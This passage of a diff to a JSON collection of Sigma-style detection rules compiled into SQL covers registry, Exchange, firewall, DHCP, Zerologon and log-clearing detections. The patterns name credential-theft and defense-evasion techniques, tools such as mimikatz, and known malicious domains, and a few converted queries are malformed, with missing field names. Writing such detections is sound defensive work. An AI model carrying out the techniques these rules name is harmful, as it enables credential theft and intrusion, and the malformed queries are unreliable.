'%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "status": "experimental", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "status": "test", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "status": "experimental", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_delete_all_rules.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", - "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1210", + "attack.lateral_movement" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE 